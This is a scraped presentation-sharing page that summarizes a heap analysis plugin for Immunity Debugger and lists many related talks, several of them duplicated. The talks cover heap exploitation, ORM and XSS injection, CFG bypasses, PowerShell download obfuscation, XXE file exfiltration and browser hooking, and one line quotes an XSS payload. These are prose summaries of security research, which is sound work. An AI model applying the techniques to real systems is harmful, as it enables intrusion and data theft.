This document provides an overview of the heaper tool, which is a heap analysis plugin for the Immunity Debugger. It was developed to help with offensive security research and analyzing heap overflows. The document discusses heaper's design, installation, usage, and capabilities such as visualizing heap layouts and validating heap chunks. It also provides examples of analyzing Windows structures and a demonstration of using heaper to examine a heap overflow.
Slides from a quick and dirty presentation I gave to colleagues on Continuous Integration, Unit / Spec testing, etc.
CREDIT: this is very much in the Zach Holman school of presentation. I borrowed a lot of inspiration (and some colors/fonts) from his designs. Attribution was given.
Marrying Jenkins and Gerrit-Berlin Expert Days 2013Dharmesh Sheta
The document discusses marrying Gerrit and Jenkins to improve the code review process. Gerrit is a widely used Git server and code review tool. Jenkins is a popular open source continuous integration tool. By connecting Gerrit and Jenkins, developers can ensure code review requests meet quality standards before review by having Jenkins automatically build and test code changes and report the results in Gerrit. This allows code review to focus on design and avoids wasted time on requests that fail builds or tests. The document then demonstrates this workflow with Gerrit and Jenkins.
An introduction to the motivation and theory behind test-driven development, suitable for people with experience in Mac or iOS development using Objective-C.
O Android NDK é a ferramenta que permite a utilização de código nativo (C/C++) em sua aplicação Android. Nesta apresentação conheça alguns usos interessantes do NDK, as vantagens e desvantagens de utilizá-lo, além de como começar a usar esta ferramenta com o Android Studio.
This document provides an overview of an agile testing process and risk-based testing approach. It discusses using scrum boards to track testing status and priorities. Visual representations of testing progress and risks are emphasized to improve communication. Test dashboards are presented as a way to monitor testing metrics and quality.
Taking a Test Drive: iOS Dev UK guide to TDDGraham Lee
The document discusses test-driven development (TDD) and how it can be used to write iOS apps. Some key points:
- TDD aims to validate code behavior, discover defects early, verify fixes, and detect regressions by writing tests before code.
- Unit tests validate individual classes and components, while integration, system, and acceptance tests validate how pieces work together.
- Practicing TDD results in code that is easier to test (small focused classes/methods with few side effects) and design that is more modular.
- Fake objects and mocks can be used to test components that interact with external systems by isolating their behavior.
- Overall, TDD promotes a test
The document discusses agile testing and the role of testers in agile projects. It begins with introducing the speaker, Pascal Dufour, and his background in agile testing. Then, it asks why agile testing is important and discusses the role of testers in agile. Throughout, it emphasizes that requirements are uncertain in software development and changes are inevitable. It promotes techniques like acceptance test-driven development to reduce delays in finding mistakes and improve collaboration between teams.
Teseda provides test systems and diagnostic software to help customers debug chips and analyze failures. Their V520 and V550 test systems can test up to 348 and 512 I/O pins respectively and generate test patterns. Teseda Workbench software allows users to import test patterns, execute tests, analyze failures, and map failing scan cells to the chip design. The Diagnostic Manager NetXY software further diagnoses scan failures by analyzing the chip design and test patterns to identify the likely location of faults. Teseda's solutions help reduce time to fix design and manufacturing issues.
Slides from a quick and dirty presentation I gave to colleagues on Continuous Integration, Unit / Spec testing, etc.
CREDIT: this is very much in the Zach Holman school of presentation. I borrowed a lot of inspiration (and some colors/fonts) from his designs. Attribution was given.
Marrying Jenkins and Gerrit-Berlin Expert Days 2013Dharmesh Sheta
The document discusses marrying Gerrit and Jenkins to improve the code review process. Gerrit is a widely used Git server and code review tool. Jenkins is a popular open source continuous integration tool. By connecting Gerrit and Jenkins, developers can ensure code review requests meet quality standards before review by having Jenkins automatically build and test code changes and report the results in Gerrit. This allows code review to focus on design and avoids wasted time on requests that fail builds or tests. The document then demonstrates this workflow with Gerrit and Jenkins.
An introduction to the motivation and theory behind test-driven development, suitable for people with experience in Mac or iOS development using Objective-C.
O Android NDK é a ferramenta que permite a utilização de código nativo (C/C++) em sua aplicação Android. Nesta apresentação conheça alguns usos interessantes do NDK, as vantagens e desvantagens de utilizá-lo, além de como começar a usar esta ferramenta com o Android Studio.
This document provides an overview of an agile testing process and risk-based testing approach. It discusses using scrum boards to track testing status and priorities. Visual representations of testing progress and risks are emphasized to improve communication. Test dashboards are presented as a way to monitor testing metrics and quality.
Taking a Test Drive: iOS Dev UK guide to TDDGraham Lee
The document discusses test-driven development (TDD) and how it can be used to write iOS apps. Some key points:
- TDD aims to validate code behavior, discover defects early, verify fixes, and detect regressions by writing tests before code.
- Unit tests validate individual classes and components, while integration, system, and acceptance tests validate how pieces work together.
- Practicing TDD results in code that is easier to test (small focused classes/methods with few side effects) and design that is more modular.
- Fake objects and mocks can be used to test components that interact with external systems by isolating their behavior.
- Overall, TDD promotes a test
The document discusses agile testing and the role of testers in agile projects. It begins with introducing the speaker, Pascal Dufour, and his background in agile testing. Then, it asks why agile testing is important and discusses the role of testers in agile. Throughout, it emphasizes that requirements are uncertain in software development and changes are inevitable. It promotes techniques like acceptance test-driven development to reduce delays in finding mistakes and improve collaboration between teams.
Teseda provides test systems and diagnostic software to help customers debug chips and analyze failures. Their V520 and V550 test systems can test up to 348 and 512 I/O pins respectively and generate test patterns. Teseda Workbench software allows users to import test patterns, execute tests, analyze failures, and map failing scan cells to the chip design. The Diagnostic Manager NetXY software further diagnoses scan failures by analyzing the chip design and test patterns to identify the likely location of faults. Teseda's solutions help reduce time to fix design and manufacturing issues.
The document discusses the low fragmentation heap (LFH) used in Windows to improve memory allocation performance. It provides an overview of how the LFH works, including the different memory managers (front-end, back-end), data structures used, and the processes for allocating and deallocating memory. It then discusses techniques for exploiting the determinism of the LFH, such as heap feng shui to control memory layout, and overwriting fields to trigger memory corruption.
D2 t2 steven seeley - ghost in the windows 7 allocator_mr_me
I presented "Ghost in the Allocator" at Hack In The Box Amsterdam, 2012.
I demonstrated a new technique/variation for exploitation against the Windows 7 heap manager that abuses the allocation offset mechanism. Additionally, I also presented a likely attack technique against the consumer preview version of the Windows 8 heap manager.
As @nicowaisman mentioned in his talk Aleatory Persistent Threat, old school heap specific exploiting is dying. And with each windows SP or new version, is harder to attack heap itself. Heap management adapt quickly and include new mittigation techniques. But sometimes is better to rethink the idea of mittigation and do this technique properly even half version of it will cover all known heap exploit techniques…
ORM2Pwn: Exploiting injections in Hibernate ORMMikhail Egorov
Mikhail Egorov and Sergey Soldatov presented their research on exploiting injections in Hibernate ORM. They demonstrated that while Hibernate Query Language (HQL) is more limited than SQL, it is possible to exploit HQL injections to conduct SQL injections on popular databases like MySQL, PostgreSQL, Oracle, and Microsoft SQL Server. They did this by leveraging features of Hibernate and the databases like how Hibernate handles string escaping and allows unicode characters in identifiers. Their talk provided examples of exploiting each database and a takeaway that Hibernate is not a web application firewall and HQL injections can be used to perform SQL injections.
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesPeter Hlavaty
The document discusses exploiting TrueType font (TTF) vulnerabilities to achieve kernel code execution on Windows systems. It begins by describing the discovery of exploitable bugs in a TTF fuzzer. Despite mitigations like KASLR, NX, SMAP, and CFG, the researchers were able to bypass these protections through techniques like controlled overflows, abusing plain kernel structures, and function-driven attacks. They show how to leverage wild overflows, control kernel memory layout, and hijack control flow to achieve arbitrary code execution. The document emphasizes that OS design weaknesses allow bypassing modern defenses through clever bug chaining and memory manipulation.
Expanding the control over the operating system from the databaseBernardo Damele A. G.
Using a database, either via a SQL injection or via direct connection, as a stepping stone to control the underlying operating system can be achieved.
There is much to say on operating system control by owning a database server: Windows registry access, anti-forensics technique to establish an out-of-band stealth connection, buffer overflow exploitation with memory protections bypass and custom user-defined function injection.
These slides have been presented at SOURCE Conference in Barcelona on September 21, 2009.
This document discusses ORM injection vulnerabilities using Hibernate and MySQL as an example. It begins with an introduction to injection vulnerabilities and ORM concepts. It then demonstrates how SQL injection is possible by exploiting differences in escaping rules between HQL and MySQL. A proof of concept shows injecting HQL to retrieve all records, and injecting SQL directly by escaping quotes differently. The document concludes that input validation and parameterized queries are needed to prevent ORM injection, and frameworks may not fully prevent injection depending on the underlying database.
The document discusses techniques for obfuscating PowerShell commands to evade detection. It begins by motivating the need for improved PowerShell logging and detection capabilities as PowerShell is increasingly used by attackers. It then outlines ways to prepare systems for PowerShell investigations through process auditing and command line logging. One section focuses on obfuscating the common technique of using New-Object Net.WebClient to perform remote downloads. It demonstrates how this command can be broken up and variables used to avoid detection based solely on the presence of certain strings.
This document summarizes a presentation about attacking the DirectComposition component of the Windows graphics subsystem. It discusses:
1) An overview of DirectComposition and its architecture.
2) Two zero-day vulnerabilities the researchers found - a double free bug and integer overflow bug that were exploited to achieve code execution.
3) Their fuzzing approach and how they increased coverage of important DirectComposition functions.
4) Mitigation techniques Microsoft employed in later versions and ways the researchers bypassed them, such as abusing tagWND and bitmap objects.
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...CanSecWest
The document discusses techniques for bypassing Control Flow Guard (CFG) protections on Windows. It begins by introducing the author and their background in security research. It then outlines several potential attack surfaces for bypassing CFG, including using functions like VirtualAlloc and VirtualProtect that can mark memory as valid call targets, writing return addresses, and leveraging indirect calls without CFG checks. The document analyzes six CFG bypass vulnerabilities found by the author in Microsoft Edge and Chakra, and provides details on exploitation methods. It concludes by discussing improvements to harden CFG protections further.
CSW2017 Weston miller csw17_mitigating_native_remote_code_executionCanSecWest
This document summarizes security features in Microsoft Azure to prevent control-flow hijacking and arbitrary code generation. It describes Control Flow Guard, Arbitrary Code Guard, and Code Integrity Guard which enforce control flow integrity, prevent dynamic code generation and modification, and only allow signed code pages. It also discusses some known limitations and bypasses that Microsoft is working to address through additional security features like Control-flow Enforcement Technology (CET).
Bart Leppens gave a presentation on the Browser Exploitation Framework (BeEF). He discussed BeEF's architecture, how it hooks browsers, its module and extension system, and live demonstrations of information gathering, exploitation, and using BeEF with Metasploit. He also covered topics like inter-protocol communication, exploiting protocols like ActiveFax, and porting BeEF bind shellcode to Linux. The talk provided an overview of BeEF's capabilities and real-world attack scenarios.
The document discusses different types of heaps and heap algorithms. It describes binary min-heaps and max-heaps, including their properties and implementations using arrays. Basic heap operations like insert, delete, and build heap are explained along with their time complexities. Applications of heaps like priority queues and selection algorithms are covered. More advanced heap types like leftist heaps, skew heaps and binomial queues are also mentioned.
[Blackhat2015] FileCry attack against JavaMoabi.com
This document discusses vulnerabilities in XML parsers in Oracle JDK versions prior to 7u67. It demonstrates that the parsers are vulnerable to XML external entity (XXE) attacks despite existing defenses. It shows proof-of-concept payloads that can exfiltrate file contents like /etc/passwd from a remote server using untrusted XML files. While defenses exist, the document finds that they are insufficient and fail to mitigate XXE risks in many parsers. It evaluates the defenses in various XML parsers and recommends configurations to disable external entity resolution and prevent XXE attacks.
The Hidden XSS - Attacking the Desktop & Mobile Platformskosborn
The document discusses cross-site scripting (XSS) attacks that can occur outside of web browsers on desktop and mobile platforms. It provides examples of XSS vulnerabilities found in Skype, Adium, Android's Gmail app, Google Earth, and outlines a tool built to automate discovery and exfiltration of files across platforms like Mac, Android and others. The document encourages developers to properly filter HTML and secure apps from XSS attacks.
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
Microsoft's web browsers, Internet Explorer and Edge, have a feature called 'XSS filter' built in which protects users from XSS attacks. In order to deny XSS attacks, XSS filter looks into the request for a string resembling an XSS attack, compares it with the page and finds the appearance of it, and rewrites parts of the string if it appears in the page. This rewriting process of the string - is this done safely? The answer is no. This time, I have found a way to exploit XSS filter not to protect a web page, but to create an XSS vulnerability on a web page that is completely sane and free of XSS vulnerability. In this talk, I will describe technical details about possibilities of XSS attacks exploiting XSS filter and propose what website administrators should do to face this XSS filter nightmare.
ModSecurity is an open source web application firewall module for Apache that includes filters to detect and block cross-site scripting (XSS) attacks. However, its XSS filters are ineffective and infrequently updated. The filters primarily rely on matching keywords and regular expressions related to JavaScript and other client-side scripting languages in the HTTP response, but do not handle different character encodings well. While ModSecurity is easy to install as an Apache module, its limitations mean attacks can still evade detection.
XSS is much more than just <script>alert(1)</script>. Thousands of unique vectors can be built and more complex payloads to evade filters and WAFs. In these slides, cool techniques to bypass them are described, from HTML to javascript. See also http://brutelogic.com.br/blog
New Methods in Automated XSS Detection & Dynamic Exploit CreationKen Belva
This slide deck consists of three presentations showing both an overall and detailed view of the new patent pending methods to make Cross-Site Scripting (XSS) detection more accurate and faster as well as the creation of dynamic exploits. It was presented at OWASP AppSecUSA 2015. All Material and Methods Patent Pending Globally. All Rights Reserved.
Please visit: http://xssWarrior.com
The document summarizes a presentation on automating Drupal deployment using version control, Drush, and Features. It discusses typical development environments, deployment mistakes to avoid, and using version control, shell scripts, and continuous integration servers to automate repetitive deployment tasks and ensure changes are tested at each stage from local to development to staging and production.
The document discusses the low fragmentation heap (LFH) used in Windows to improve memory allocation performance. It provides an overview of how the LFH works, including the different memory managers (front-end, back-end), data structures used, and the processes for allocating and deallocating memory. It then discusses techniques for exploiting the determinism of the LFH, such as heap feng shui to control memory layout, and overwriting fields to trigger memory corruption.
D2 t2 steven seeley - ghost in the windows 7 allocator_mr_me
I presented "Ghost in the Allocator" at Hack In The Box Amsterdam, 2012.
I demonstrated a new technique/variation for exploitation against the Windows 7 heap manager that abuses the allocation offset mechanism. Additionally, I also presented a likely attack technique against the consumer preview version of the Windows 8 heap manager.
As @nicowaisman mentioned in his talk Aleatory Persistent Threat, old school heap specific exploiting is dying. And with each windows SP or new version, is harder to attack heap itself. Heap management adapt quickly and include new mittigation techniques. But sometimes is better to rethink the idea of mittigation and do this technique properly even half version of it will cover all known heap exploit techniques…
ORM2Pwn: Exploiting injections in Hibernate ORMMikhail Egorov
Mikhail Egorov and Sergey Soldatov presented their research on exploiting injections in Hibernate ORM. They demonstrated that while Hibernate Query Language (HQL) is more limited than SQL, it is possible to exploit HQL injections to conduct SQL injections on popular databases like MySQL, PostgreSQL, Oracle, and Microsoft SQL Server. They did this by leveraging features of Hibernate and the databases like how Hibernate handles string escaping and allows unicode characters in identifiers. Their talk provided examples of exploiting each database and a takeaway that Hibernate is not a web application firewall and HQL injections can be used to perform SQL injections.
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesPeter Hlavaty
The document discusses exploiting TrueType font (TTF) vulnerabilities to achieve kernel code execution on Windows systems. It begins by describing the discovery of exploitable bugs in a TTF fuzzer. Despite mitigations like KASLR, NX, SMAP, and CFG, the researchers were able to bypass these protections through techniques like controlled overflows, abusing plain kernel structures, and function-driven attacks. They show how to leverage wild overflows, control kernel memory layout, and hijack control flow to achieve arbitrary code execution. The document emphasizes that OS design weaknesses allow bypassing modern defenses through clever bug chaining and memory manipulation.
Expanding the control over the operating system from the databaseBernardo Damele A. G.
Using a database, either via a SQL injection or via direct connection, as a stepping stone to control the underlying operating system can be achieved.
There is much to say on operating system control by owning a database server: Windows registry access, anti-forensics technique to establish an out-of-band stealth connection, buffer overflow exploitation with memory protections bypass and custom user-defined function injection.
These slides have been presented at SOURCE Conference in Barcelona on September 21, 2009.
This document discusses ORM injection vulnerabilities using Hibernate and MySQL as an example. It begins with an introduction to injection vulnerabilities and ORM concepts. It then demonstrates how SQL injection is possible by exploiting differences in escaping rules between HQL and MySQL. A proof of concept shows injecting HQL to retrieve all records, and injecting SQL directly by escaping quotes differently. The document concludes that input validation and parameterized queries are needed to prevent ORM injection, and frameworks may not fully prevent injection depending on the underlying database.
The document discusses techniques for obfuscating PowerShell commands to evade detection. It begins by motivating the need for improved PowerShell logging and detection capabilities as PowerShell is increasingly used by attackers. It then outlines ways to prepare systems for PowerShell investigations through process auditing and command line logging. One section focuses on obfuscating the common technique of using New-Object Net.WebClient to perform remote downloads. It demonstrates how this command can be broken up and variables used to avoid detection based solely on the presence of certain strings.
This document summarizes a presentation about attacking the DirectComposition component of the Windows graphics subsystem. It discusses:
1) An overview of DirectComposition and its architecture.
2) Two zero-day vulnerabilities the researchers found - a double free bug and integer overflow bug that were exploited to achieve code execution.
3) Their fuzzing approach and how they increased coverage of important DirectComposition functions.
4) Mitigation techniques Microsoft employed in later versions and ways the researchers bypassed them, such as abusing tagWND and bitmap objects.
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...CanSecWest
The document discusses techniques for bypassing Control Flow Guard (CFG) protections on Windows. It begins by introducing the author and their background in security research. It then outlines several potential attack surfaces for bypassing CFG, including using functions like VirtualAlloc and VirtualProtect that can mark memory as valid call targets, writing return addresses, and leveraging indirect calls without CFG checks. The document analyzes six CFG bypass vulnerabilities found by the author in Microsoft Edge and Chakra, and provides details on exploitation methods. It concludes by discussing improvements to harden CFG protections further.
CSW2017 Weston miller csw17_mitigating_native_remote_code_executionCanSecWest
This document summarizes security features in Microsoft Azure to prevent control-flow hijacking and arbitrary code generation. It describes Control Flow Guard, Arbitrary Code Guard, and Code Integrity Guard which enforce control flow integrity, prevent dynamic code generation and modification, and only allow signed code pages. It also discusses some known limitations and bypasses that Microsoft is working to address through additional security features like Control-flow Enforcement Technology (CET).
Bart Leppens gave a presentation on the Browser Exploitation Framework (BeEF). He discussed BeEF's architecture, how it hooks browsers, its module and extension system, and live demonstrations of information gathering, exploitation, and using BeEF with Metasploit. He also covered topics like inter-protocol communication, exploiting protocols like ActiveFax, and porting BeEF bind shellcode to Linux. The talk provided an overview of BeEF's capabilities and real-world attack scenarios.
The document discusses different types of heaps and heap algorithms. It describes binary min-heaps and max-heaps, including their properties and implementations using arrays. Basic heap operations like insert, delete, and build heap are explained along with their time complexities. Applications of heaps like priority queues and selection algorithms are covered. More advanced heap types like leftist heaps, skew heaps and binomial queues are also mentioned.
[Blackhat2015] FileCry attack against JavaMoabi.com
This document discusses vulnerabilities in XML parsers in Oracle JDK versions prior to 7u67. It demonstrates that the parsers are vulnerable to XML external entity (XXE) attacks despite existing defenses. It shows proof-of-concept payloads that can exfiltrate file contents like /etc/passwd from a remote server using untrusted XML files. While defenses exist, the document finds that they are insufficient and fail to mitigate XXE risks in many parsers. It evaluates the defenses in various XML parsers and recommends configurations to disable external entity resolution and prevent XXE attacks.
The Hidden XSS - Attacking the Desktop & Mobile Platformskosborn
The document discusses cross-site scripting (XSS) attacks that can occur outside of web browsers on desktop and mobile platforms. It provides examples of XSS vulnerabilities found in Skype, Adium, Android's Gmail app, Google Earth, and outlines a tool built to automate discovery and exfiltration of files across platforms like Mac, Android and others. The document encourages developers to properly filter HTML and secure apps from XSS attacks.
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
Microsoft's web browsers, Internet Explorer and Edge, have a feature called 'XSS filter' built in which protects users from XSS attacks. In order to deny XSS attacks, XSS filter looks into the request for a string resembling an XSS attack, compares it with the page and finds the appearance of it, and rewrites parts of the string if it appears in the page. This rewriting process of the string - is this done safely? The answer is no. This time, I have found a way to exploit XSS filter not to protect a web page, but to create an XSS vulnerability on a web page that is completely sane and free of XSS vulnerability. In this talk, I will describe technical details about possibilities of XSS attacks exploiting XSS filter and propose what website administrators should do to face this XSS filter nightmare.
ModSecurity is an open source web application firewall module for Apache that includes filters to detect and block cross-site scripting (XSS) attacks. However, its XSS filters are ineffective and infrequently updated. The filters primarily rely on matching keywords and regular expressions related to JavaScript and other client-side scripting languages in the HTTP response, but do not handle different character encodings well. While ModSecurity is easy to install as an Apache module, its limitations mean attacks can still evade detection.
XSS is much more than just <script>alert(1)</script>. Thousands of unique vectors can be built and more complex payloads to evade filters and WAFs. In these slides, cool techniques to bypass them are described, from HTML to javascript. See also http://brutelogic.com.br/blog
New Methods in Automated XSS Detection & Dynamic Exploit CreationKen Belva
This slide deck consists of three presentations showing both an overall and detailed view of the new patent pending methods to make Cross-Site Scripting (XSS) detection more accurate and faster as well as the creation of dynamic exploits. It was presented at OWASP AppSecUSA 2015. All Material and Methods Patent Pending Globally. All Rights Reserved.
Please visit: http://xssWarrior.com
The document summarizes a presentation on automating Drupal deployment using version control, Drush, and Features. It discusses typical development environments, deployment mistakes to avoid, and using version control, shell scripts, and continuous integration servers to automate repetitive deployment tasks and ensure changes are tested at each stage from local to development to staging and production.
This document provides a summary of little known native debugging tricks in Visual Studio. It discusses using the expression evaluator for evaluating expressions in different scopes. It also covers using Edit and Continue, setting breakpoints on specific errors, breaking on all methods of a class, naming native threads, and searching through memory. The document provides code examples and links to blog posts with more details on these techniques.
https://github.com/vorburger/opendaylight-eclipse-setup
Watch https://www.youtube.com/watch?v=TU1zjytlwFE recording of this same presentation. Same slides are also available in better quality on https://docs.google.com/presentation/d/14yLzog3OhIlVsk7Clr0Tff1YayRcFnQCUZqxHMWxiNI/.
Watch https://www.youtube.com/watch?v=BLW8aOh6WeQ screencast video to see a step by step walk through for how to use what's introduced here.
Presentation given at the OpenDaylight Open Source Software Defined Networking Mini Summit on 2016.06-21 in Berlin at the Open Platform for NFV (OPNFV) summit, by Michael Vorburger.
This document discusses continuous delivery practices for .NET projects. It covers using Git for version control, protecting branches, conducting code reviews, running static analysis and unit tests, and deploying using tools like Octopus Deploy. Challenges of using Visual Studio Team Services are also mentioned. The recommended setup combines GitHub, SonarQube, Fake, xUnit, TeamCity and Octopus.
This document introduces Selenium, an open source web application testing tool. It can run tests across multiple browsers simultaneously. Selenium tests are written in plain HTML and control the browser using JavaScript. It allows testing web applications for acceptance testing and regression testing in an automated fashion. The document provides an overview of Selenium's capabilities, components, supported browsers and platforms. It also discusses tips, extensions and common problems encountered with Selenium and compares it to Rational Functional Tester.
This document discusses DevOps concepts and the DevOps journey. It covers Agile development, continuous integration, continuous delivery, and continuous deployment. These concepts aim to have short production cycles through frequent code integration and reliable releases. However, the document notes that real-life DevOps implementation is not simple. It must address having multiple environments, secrets, security, many products/developers/systems, high availability, access control, and monitoring. While DevOps adds value and saves costs, the approach depends on company size and projects. Overall, DevOps should be considered a product in itself.
Agenda:
After covering the basics about how to find and interact with UI elements, we will look into techniques of writing maintainable tests with selendroid.
In the end we will run our tests in parallel using the Selenium Grid.
The workshop repository can be found here:
https://github.com/DominikDary/selendroid-workshop
Codeception Testing Framework -- English #phpkansaiFlorent Batard
The document discusses introducing Codeception, a PHP testing framework. It begins with an agenda that includes a presentation on Codeception, different test types, a demonstration, and best practices. It then introduces the speaker, Florent Batard, who is a security engineer and web developer from France. He explains why testing is important for reducing assumptions and validating that code runs as expected. The bulk of the document then focuses on Codeception, explaining what it is, how it works, the different types of tests it supports including acceptance, functional, and unit tests, and how to install and use it. Code examples are provided and it concludes with referencing materials and opening the floor for questions.
Continuous Delivery the French Way – Dimitri Baeli Agile Tour Beirut
Return of experience of the CTO of lefuret.com, the leading French insurance aggregator teams on how they move from 2 weeks iteration to continuous delivery
What you will learn:
Overview of the Scrum cycle, and How they overcome the challenge of continuous integration, tips & tricks.
Continuous Delivery Agile Tour Beirut 2015Dimitri Baeli
Presentation done at Agile Tour Beirut 2015 about the way LesFurets.com learnt and applies the Continous Delivery principles.
* Books and principles
* Main activities
Greens Technology is then Best Selenium Training in Chennai with Job Placements. Rated as Best Selenium Training Institute in Chennai located in Adyar, Velachery, Tambaram and OMR.
Testing with Jenkins, Selenium and Continuous DeploymentMax Klymyshyn
This document discusses using Jenkins, Selenium and continuous deployment for testing web applications. It proposes using Jenkins for continuous integration, running Selenium tests on Amazon AWS instances through a Selenium Grid. A deployment tool is suggested to deploy any version of the code within an isolated environment using tools like Fabric, Gunicorn and Nginx. The solution allows running tests periodically, executing them in parallel on different browsers and providing live URLs of branches for QA testing.
This document summarizes various native debugging tricks in Visual Studio, including using the expression evaluator, Edit and Continue limitations, StepOver configuration, customizing autoexp.dat, setting breakpoints on class methods, naming native threads, breaking on data reads, investigating object layout, and useful pseudo-registers. It provides resources for further information on these debugging techniques.
Selenium has an industry reputation of being a “flaky” tool where individual tests pass, then fail—sometimes with no production changes at all. Such flakiness in your test suites can be extremely difficult, time consuming, and frustrating to debug. The vast majority of these issues stem from using either bad locators or bad wait conditions. But both of these root causes can be addressed by implementing the right framework for your Selenium tests. Craig Schwarzwald shares the most important concepts in creating such a Selenium framework. He has proved that using a framework containing a Base Page Object that wraps core Selenium methods will produce a number of significant benefits to Selenium suites. Explore how having a single place to perform logging and error handling of core Selenium functions—as well as implementing easy uses for explicit waits—will solve nearly all Selenium flakiness issues in your test suites. Plus, you benefit from making your tests easy to create, read, and maintain over the long term.
The document discusses Selenium, an open source tool for automating web application testing. It provides an overview of Selenium and its components, including Selenium IDE for recording and playing back tests in a browser, Selenium RC for distributing tests across multiple machines, and Selenium Grid for running tests in parallel across different browsers and platforms. The document also covers setting up and writing basic tests using Selenium's Ruby client driver and frameworks like Test::Unit.
This document provides a summary of key concepts for new SharePoint developers. It discusses what functionality SharePoint provides out of the box, how the development tools and deployment process differ from a typical web application, important concepts like features and packages, and best practices around areas like disposing objects properly and avoiding direct web.config modifications. It also lists 10 things every SharePoint developer should know and how to avoid getting code rejected by an architecture group.
Security is tough and is even tougher to do, in complex environments with lots of dependencies and monolithic architecture. With emergence of Microservice architecture, security has become a bit easier however it introduces its own set of security challenges. This talk will showcase how we can leverage DevSecOps techniques to secure APIs/Microservices using free and open source software. We will also discuss how emerging technologies like Docker, Kubernetes, Clair, ansible, consul, vault, etc., can be used to scale/strengthen the security program for free.
More details here - https://www.practical-devsecops.com/
Perforce Helix Never Dies: DevOps at Bandai Namco StudiosPerforce
Traditionally at Bandai Namco Studios, there has been no unified version control system in place and teams could choose to use any VCS system for their game titles—Subversion, Git, AlienBrain, or none at all. I’ll talk about why Bandai Namco Studios chose to standardize on Perforce Helix, show how we develop LiveOps-type mobile applications using the Unity game engine, and the advantages we gain from centrally managing code and assets in Helix.
Similar to How to-catch-a-chameleon-steven seeley-ruxcon-2012 (20)
In the rapidly evolving landscape of technologies, XML continues to play a vital role in structuring, storing, and transporting data across diverse systems. The recent advancements in artificial intelligence (AI) present new methodologies for enhancing XML development workflows, introducing efficiency, automation, and intelligent capabilities. This presentation will outline the scope and perspective of utilizing AI in XML development. The potential benefits and the possible pitfalls will be highlighted, providing a balanced view of the subject.
We will explore the capabilities of AI in understanding XML markup languages and autonomously creating structured XML content. Additionally, we will examine the capacity of AI to enrich plain text with appropriate XML markup. Practical examples and methodological guidelines will be provided to elucidate how AI can be effectively prompted to interpret and generate accurate XML markup.
Further emphasis will be placed on the role of AI in developing XSLT, or schemas such as XSD and Schematron. We will address the techniques and strategies adopted to create prompts for generating code, explaining code, or refactoring the code, and the results achieved.
The discussion will extend to how AI can be used to transform XML content. In particular, the focus will be on the use of AI XPath extension functions in XSLT, Schematron, Schematron Quick Fixes, or for XML content refactoring.
The presentation aims to deliver a comprehensive overview of AI usage in XML development, providing attendees with the necessary knowledge to make informed decisions. Whether you’re at the early stages of adopting AI or considering integrating it in advanced XML development, this presentation will cover all levels of expertise.
By highlighting the potential advantages and challenges of integrating AI with XML development tools and languages, the presentation seeks to inspire thoughtful conversation around the future of XML development. We’ll not only delve into the technical aspects of AI-powered XML development but also discuss practical implications and possible future directions.
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AIVladimir Iglovikov, Ph.D.
Presented by Vladimir Iglovikov:
- https://www.linkedin.com/in/iglovikov/
- https://x.com/viglovikov
- https://www.instagram.com/ternaus/
This presentation delves into the journey of Albumentations.ai, a highly successful open-source library for data augmentation.
Created out of a necessity for superior performance in Kaggle competitions, Albumentations has grown to become a widely used tool among data scientists and machine learning practitioners.
This case study covers various aspects, including:
People: The contributors and community that have supported Albumentations.
Metrics: The success indicators such as downloads, daily active users, GitHub stars, and financial contributions.
Challenges: The hurdles in monetizing open-source projects and measuring user engagement.
Development Practices: Best practices for creating, maintaining, and scaling open-source libraries, including code hygiene, CI/CD, and fast iteration.
Community Building: Strategies for making adoption easy, iterating quickly, and fostering a vibrant, engaged community.
Marketing: Both online and offline marketing tactics, focusing on real, impactful interactions and collaborations.
Mental Health: Maintaining balance and not feeling pressured by user demands.
Key insights include the importance of automation, making the adoption process seamless, and leveraging offline interactions for marketing. The presentation also emphasizes the need for continuous small improvements and building a friendly, inclusive community that contributes to the project's growth.
Vladimir Iglovikov brings his extensive experience as a Kaggle Grandmaster, ex-Staff ML Engineer at Lyft, sharing valuable lessons and practical advice for anyone looking to enhance the adoption of their open-source projects.
Explore more about Albumentations and join the community at:
GitHub: https://github.com/albumentations-team/albumentations
Website: https://albumentations.ai/
LinkedIn: https://www.linkedin.com/company/100504475
Twitter: https://x.com/albumentations
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfPaige Cruz
Monitoring and observability aren’t traditionally found in software curriculums and many of us cobble this knowledge together from whatever vendor or ecosystem we were first introduced to and whatever is a part of your current company’s observability stack.
While the dev and ops silo continues to crumble….many organizations still relegate monitoring & observability as the purview of ops, infra and SRE teams. This is a mistake - achieving a highly observable system requires collaboration up and down the stack.
I, a former op, would like to extend an invitation to all application developers to join the observability party will share these foundational concepts to build on:
A tale of scale & speed: How the US Navy is enabling software delivery from l...sonjaschweigert1
Rapid and secure feature delivery is a goal across every application team and every branch of the DoD. The Navy’s DevSecOps platform, Party Barge, has achieved:
- Reduction in onboarding time from 5 weeks to 1 day
- Improved developer experience and productivity through actionable findings and reduction of false positives
- Maintenance of superior security standards and inherent policy enforcement with Authorization to Operate (ATO)
Development teams can ship efficiently and ensure applications are cyber ready for Navy Authorizing Officials (AOs). In this webinar, Sigma Defense and Anchore will give attendees a look behind the scenes and demo secure pipeline automation and security artifacts that speed up application ATO and time to production.
We will cover:
- How to remove silos in DevSecOps
- How to build efficient development pipeline roles and component templates
- How to deliver security artifacts that matter for ATO’s (SBOMs, vulnerability reports, and policy evidence)
- How to streamline operations with automated policy checks on container images
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionAggregage
Join Maher Hanafi, VP of Engineering at Betterworks, in this new session where he'll share a practical framework to transform Gen AI prototypes into impactful products! He'll delve into the complexities of data collection and management, model selection and optimization, and ensuring security, scalability, and responsible use.
20 Comprehensive Checklist of Designing and Developing a WebsitePixlogix Infotech
Dive into the world of Website Designing and Developing with Pixlogix! Looking to create a stunning online presence? Look no further! Our comprehensive checklist covers everything you need to know to craft a website that stands out. From user-friendly design to seamless functionality, we've got you covered. Don't miss out on this invaluable resource! Check out our checklist now at Pixlogix and start your journey towards a captivating online presence today.
How to Get CNIC Information System with Paksim Ga.pptxdanishmna97
